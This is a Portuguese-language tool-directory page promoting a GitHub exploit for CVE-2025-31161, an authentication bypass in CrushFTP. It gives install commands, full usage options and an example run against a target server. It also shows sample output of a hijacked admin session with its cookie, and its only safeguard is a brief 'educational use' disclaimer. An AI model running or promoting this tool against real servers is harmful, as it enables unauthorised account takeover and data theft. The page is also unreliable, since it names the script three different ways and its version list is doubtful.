Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-31161 — Ferramenta de Exploit CrushFTP CVE-2025-31161 🔓 | Kitploit
Ferramentas/GitHubGitHub/tx-one/cve-2025-31161
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAutenticação
GitHubtx-one/cve-2025-31161

CVE-2025-31161

Ferramenta de Exploit CrushFTP CVE-2025-31161 🔓

Ver Repositório
21há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CrushFTP CVE-2025-31161 Ferramenta de Exploração 🔓

Ferramenta avançada de deteção e exploração para a vulnerabilidade CVE-2025-31161 em versões vulneráveis do CrushFTP.

CVE-2025-31161 é uma vulnerabilidade crítica de bypass de autenticação na Interface Web do CrushFTP. Ao manipular o cabeçalho HTTP Authorization, um atacante não autenticado pode obter acesso total sob qualquer nome de utilizador válido sem fornecer a palavra-passe correta.

Versões Afetadas

  • CrushFTP 9.3.8
  • CrushFTP 9.3.9
  • CrushFTP 9.3.10
  • CrushFTP 9.3.11
  • CrushFTP 9.3.12
  • Versões Enterprise do CrushFTP anteriores a 9.3.12.5

Funcionalidades Principais 🚀

  • Deteção automática da versão do CrushFTP e verificação de vulnerabilidade
  • Teste de credenciais multi-thread para enumeração rápida de utilizadores
  • Suporte a dois métodos de autenticação (Bearer Token & Basic Auth)
  • Geração de relatório JSON com cookies de sessão
  • Mecanismos inteligentes de repetição de conexão com configurações personalizadas
  • Saída colorida no terminal com registo detalhado
Baixar ferramenta
  • Cobertura de versões vulneráveis:
    • 9.3.8 a 9.3.12.5
  • Requisitos 📋

    • Python 3.8+
    • Pacotes necessários:
      root@kitploit:~
      pip install requests colorama urllib3
      

    Instalação 🛠️

    1. Instalar dependências:
    root@kitploit:~
     pip install requests colorama urllib3
    
    1. Clonar repositório:
    root@kitploit:~
     git clone https://github.com/TX-One/CVE-2025-31161.git
     cd CVE-2025-31161
     python3 tx-crush.py -h
    

    Utilização 🖥️

    Comando Básico:

    root@kitploit:~
    python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json
    

    Opções:

    root@kitploit:~
    -h, --help            mostra esta mensagem de ajuda e sai
      -t, --target TARGET   URL do alvo (ex.: https://example.com:8080)
      -u, --users USERS     Ficheiro com lista de nomes de utilizador
      -o, --output OUTPUT   Ficheiro JSON de saída
      -T, --threads THREADS
                            Número de threads (padrão: 5)
      --no-ssl              Desativar verificação SSL
      --timeout TIMEOUT     Timeout do pedido (padrão: 15)
      --retries RETRIES     Número de tentativas (padrão: 3)
      --force               Ignorar verificação de versão
    

    Exemplo Avançado:

    root@kitploit:~
    python3 exploit.py
      -t https://vulnerable-server.com:8000
      -u ./wordlists/common_users.txt
      -o ./results/compromised.json
      -T 10
      --retries 5
      --timeout 20
    

    Exemplo de Saída 📄

    root@kitploit:~
    [
      {
        "target": "https://victim:8080",
        "user": "admin",
        "success": true,
        "method": "Bearer",
        "cookies": {"sessionID": "a1b2c3..."},
        "server_version": "CrushFTP/9.3.12"
      }
    ]
    
    root@kitploit:~
    [
      {
            "target": "http://victim:8080",
            "user": "admin",
            "success": false
        }
    ]
    

    Aviso: Este projeto destina-se apenas a fins educativos e de pesquisa em segurança. Utilização responsável é necessária.